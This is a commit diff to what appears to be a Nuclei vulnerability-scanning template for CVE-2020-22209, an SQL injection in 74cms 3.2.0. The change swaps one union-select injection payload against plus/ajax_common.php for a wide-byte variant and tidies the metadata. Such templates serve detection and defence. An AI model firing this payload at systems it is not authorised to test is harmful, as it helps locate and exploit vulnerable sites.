Update CVE-2020-22209.yaml
parent
f44f6a0719
commit
b9cddc461a
|
@ -1,14 +1,14 @@
|
|||
id: CVE-2020-22209
|
||||
|
||||
info:
|
||||
name: 74cms Sql Injection
|
||||
name: 74cms - Sql Injection
|
||||
author: ritikchaddha
|
||||
severity: critical
|
||||
description: |
|
||||
SQL Injection in 74cms 3.2.0 via the query parameter to plus/ajax_common.php.
|
||||
reference:
|
||||
- https://nvd.nist.gov/vuln/detail/CVE-2020-22209
|
||||
- https://github.com/blindkey/cve_like/issues/12
|
||||
- https://nvd.nist.gov/vuln/detail/CVE-2020-22209
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
|
||||
cvss-score: 9.8
|
||||
|
@ -22,7 +22,7 @@ info:
|
|||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/plus/ajax_common.php?act=hotword&query=11<EFBFBD>' union select%201,2,3,md5({{randstr}}),5,6,7,8,9%23"
|
||||
- "{{BaseURL}}/plus/ajax_common.php?act=hotword&query=aa%錦%27%20union%20select%201,md5({{randstr}}),3%23%27"
|
||||
|
||||
matchers:
|
||||
- type: word
|
||||
|
|
Loading…
Reference in New Issue